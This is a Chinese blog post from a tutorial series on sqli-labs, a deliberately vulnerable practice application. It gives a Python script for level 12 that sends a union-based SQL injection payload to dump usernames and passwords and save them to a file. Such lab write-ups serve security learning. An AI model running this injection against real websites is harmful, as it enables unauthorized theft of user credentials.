sqli-labs靶场自动化利用工具——第12关

已于 2024-09-12 15:05:19 修改
阅读量267 收藏 3
点赞数 2
分类专栏: Sqli-Labs靶场自动化利用工具 文章标签: sql 网络安全 python 自动化
于 2024-09-12 11:33:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/CSDNagk1/article/details/142171039
版权

文章目录

概要

Sqli-Labs靶场对于网安专业的学生或正在学习网安的朋友来说并不陌生,或者说已经很熟悉。那有没有朋友想过自己开发一个测试脚本能实现自动化化测试sqli-labs呢?可能有些人会说不是有sqlmap,那我们又何须使用这个小脚本呢?这里我统一回答,sqlmap只是一个工具,工具始终是不能代替人的思考。开发这个测试的脚本他都是有针对性的,他是针对每一关的精心设计。但凡脱离实际都是在空想。我也是一直围绕这个主题,所以想到了开发能自动化测试sqli-labs靶场每一关的POC。最后这个只能用于有基础的网安人进行学习,学习网安路还是不能投机取巧的。

本章适合人群:

  1. 网安专业学生
  2. 报班学习网安内容的同学
  3. 提高写POC能力的网安从业者

整体架构流程

因为是sqli-labs的第12关,且我觉得名字很是麻烦,所以我在写脚本的时候错将sqli-labs写成了sql-libs请见谅。如果你有强迫症可以自行修改。

整体流程主要是仿爬虫的形式访问网页,之后将得到的数据记录在和py文件同一级的目录下面。

第12关使用的双引号括号注入。

其他和第11关类似,都是post请求。

技术细节

import requests
import re
import os
print("当前工作目录:", os.getcwd())

# 全局变量
url = 'http://sql:8081/Less-12/'
headers = {
    'Host': 'sql:8081',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8',
    'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
    'Accept-Encoding': 'gzip, deflate',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Content-Length': '134',  # 根据data参数的长度进行修改
    'Origin': 'http://sql:8081',
    'Connection': 'close',
    'Referer': 'http://sql:8081/Less-12/',
    'Upgrade-Insecure-Requests': '1',
    'Priority': 'u=0, i'
}

data = {
    'uname': '-1") union select 1,(select group_concat(username,0x3a,password) from users)-- -',
    'passwd': 'password'
}

response = requests.post(url, headers=headers, data=data, verify=False)
html_content = response.text
pattern = r'Your Password:(.*?)<br>'
matches = re.search(pattern, html_content)

if matches:
    passwords = matches.group(1)
    pairs = passwords.split(',')  # 使用逗号分隔用户名和密码的组合
    file_path = os.path.join(os.getcwd(), 'data.txt')

    with open(file_path, 'w') as f:
        for pair in pairs:
            # 分割用户名和密码
            username, password = pair.split(':')
            # 写入用户名和密码到文件
            f.write(f'{username.strip()}, {password.strip()}\n')

    print('Data have been extracted and saved to data.txt.')
else:
    print("No match found")

执行效果

小结

由于我的sqli-labs靶场是搭建在我的本机,所以使用代码时需要进行修改。

且想输出不一样的文件内容格式,也可以进行微调整。

最后还是那句话网安的路上不会一帆风顺,还需脚踏实地一步一个脚印的前行,仅用于POC的学习使用,其他使用与作者无关。

转瞬都有
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Sqli-labs靶场第11详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1400
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
SQL注入18】Sqli-labs靶场1~10思路解析及思考总结——针对GET请求的注入思路
Fighting_hawk的博客
05-11 5594
1. 本文从SQLi-labs前10出发,总结各个卡通过程的思路。 2. 涵盖了联合查询注入、报错注入、布尔盲注和延时盲注四种基本类型。 3. 对比分析了不同参数测试时的用意,以便明确我们的注入思路。 4. 这些卡暂未对输入参数进行过滤,对于采用了保护措施的程序,基本思路正确,也是有可能注入不了的。 .........
sqli-labs-master靶场搭建以及报错解决
qq_53058639的博客
04-14 1629
一.前提准备1.下载:sqli-labs-master。2.安装PHP study。二.搭建靶场1.启动phpstudy。2.将sqli-labs-master.zip解压到phpstudy_pro\WWW,为访问方便我这将其更名为sqli。3.打开我们的sqli。4.在url中的localhost后输入/sqli即可成功进入。5.到这一步,我们的sqli已经搭建成功,此时我们点击发现出错了。三.问题解决。
Web安全漏洞专项靶场SQL注入—docker环境—sqli-labs靶场—详细通指南
qq_38678845的博客
01-22 2164
Web安全SQL注入漏洞的专项训练
攻防系列——pikachu靶场练习
weixin_43140411的博客
10-23 2028
从来没有哪个时代的黑客像今天一样热衷于猜解密码 ---奥斯特洛夫斯基
web安全攻防渗透测试实训笔记
m0_65385236的博客
04-07 1377
1. Nmap的基本 Nmap + ip 6+ ip Nmap -A 开启操作系统识别和版本识别功能 – T(0-6档) 设置扫描的速度 一般设置T4 过快容易被发现 -v 显示信息的级别,-vv显示更详细的信息 192.168.1.1/24 扫描C段 192.168.11 -254 =上 nmap -A -T4 -v -iL ~/targets.txt (iL表示要扫描的目标位于一个文档中) --------------- 192.168.1.1/24 ...
sql注入详解
m0_73109590的博客
08-03 1003
SQL注入(SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱库、被删除、甚至整个服务器权限陷)。...
【评论区抽奖】北大社将《Web安全攻防从入门到精通》送上新书热卖NO.1
hongrisec的博客
10-17 1772
还没看到《Web安全攻防从入门到精通》?那你的第一本安全书籍就交给红日吧,评论区留言,免费看!
leetcode 1811 寻找面试候选人(postgresql)
weixin_51696882的博客
09-11 686
编写 SQL 语句来返回 所有面试候选人 的姓名 name 和邮件 mail 。当用户满足以下两个要求中的 任意一条 ,其成为 面试候选人 : 该用户在 连续三场及更多 比赛中赢得 任意 奖牌。 该用户在 三场及更多不同的 比赛中赢得 金牌(这些比赛可以不是连续的) 可以以 任何顺序 返回结果。
被低估的SQL
weixin_61431494的博客
09-03 1638
虽然SQL的核心功能强大,但自定义函数和存储过程常常被低估。它们可以封装复杂的业务逻辑,从而提高数据库操作的效率和一致性。存储过程不仅可以接收参数,还能执行多条SQL语句,并处理事务。ASBEGIN-- 可能的其他初始化操作END;这种封装能够保证操作的原子性,同时提升了数据库应用的性能和安全性。
SQLServer分组查询
NaZiMeKiY的博客
09-08 396
例如我们再在日期后加入一个总人数在3人及以上的限制,那么就会用到聚合函数count(),但是where中是不能使用聚合函数作为限制条件的,所以我们需要用到having键字。注意点:在分组查询中除了使用聚合函数的数据和使用group by和select后面的分组之外,数据都无法作为一列显示。可以不断使用union链接,但是相对应的是代码实在太过繁琐,所以我们还是使用group by的方式进行分组。五.在使用分组查询时添加多个限制条件,并且使用到聚合函数。例如我们加上一个出生日期的限制,只统计00后的数据。
以下是一些 SQL 优化的方法:
qq_20033739的博客
09-09 418
例如,避免“WHERE DATE(column_name) = '2024-09-09'”,而应该使用“WHERE column_name >= '2024-09-09' AND column_name < '2024-09-10'”。- 例如,如果在表 A 的“column_a”列和表 B 的“column_b”列上进行连接,应该在这两个列上创建索引。- 索引可以大大提高查询的速度,但过多的索引也会影响数据的插入、更新和删除操作,因此需要权衡。- 根据实际需求选择合适的连接方式,避免不必要的全连接。
sqlserver常用的sql命令
2301_76664379的博客
09-11 578
备注:D 表示全备份,i 表示差异备份,L 表示日志备份。
基于SSM的文物管理系统(含源码+sql+视频导入教程+文档+PPT)
coderbu的博客
09-06 1391
基于SSM的文物管理系统拥有俩种角色 管理员:个人信息管理、用户管理、分类管理、文物信息管理、文物外借管理、文物维修管理、留言板管理等 用户:登录注册、分类浏览文物信息,留言评论、收藏文物等
leetcode 1651 Hopper公司查询3(postgresql)
weixin_51696882的博客
09-06 871
编写SQL查询以计算从 2020年1月至3月至2020年10月至12月 的每三个月窗口的 average_ride_distance 和 average_ride_duration 。将 average_ride_distance 和 average_ride_duration 四舍五入至 小数点后两位 。 通过将三个月的总 ride_distance 相加并除以 3 来计算 average_ride_distance 。average_ride_duration 的计算方法与此类似。 返回按 month
PostgreSQL技术内幕9:PostgreSQL事务原理解析
qq_40529346的博客
09-08 1124
本文将介绍PG事务模块,主要介绍PG支持的事务类型(普通事务,子事务,多事务,2pc事务),事务模块涉及的的子模块整体介绍(日志模块,MVCC管理,事务锁管理)和事务模块代码脉络解读。日志模块、MVCC管理和事务锁管理详细内容将在后续文章中介绍。
【PostgreSQL教程】PostgreSQL 高级篇之 TRANSACTION(事务)
No8g攻城狮的博客
09-05 487
TRANSACTION(事务)是数据库管理系统执行过程中的一个逻辑单位,由一个有限的数据库操作序列构成。数据库事务通常包含了一个序列的对数据库的读/写操作。
Spring AOP
最新发布
2301_79288225的博客
09-11 673
什么是⾯向特定⽅法编程呢?⽐如上个章节学习的"登录校验", 就是⼀类特定问题. 登录校验拦截器, 就是对"登录校验"这类问题的统⼀处理. 所以, 拦截器也是AOP的⼀种应⽤. AOP是⼀种思想, 拦截器是AOP思想的⼀种实现. Spring框架实现了这种思想, 提供了拦截器技术的相接⼝.当我们在⼀个项⽬中, 定义了多个切⾯类时, 并且这些切⾯类的多个切⼊点都匹配到了同⼀个⽬标⽅法. 当⽬标⽅法运⾏的时候, 这些切⾯类中的通知⽅法都会执⾏, 那么这⼏个通知⽅法的执⾏顺序是什么样的呢?
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

转瞬都有

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值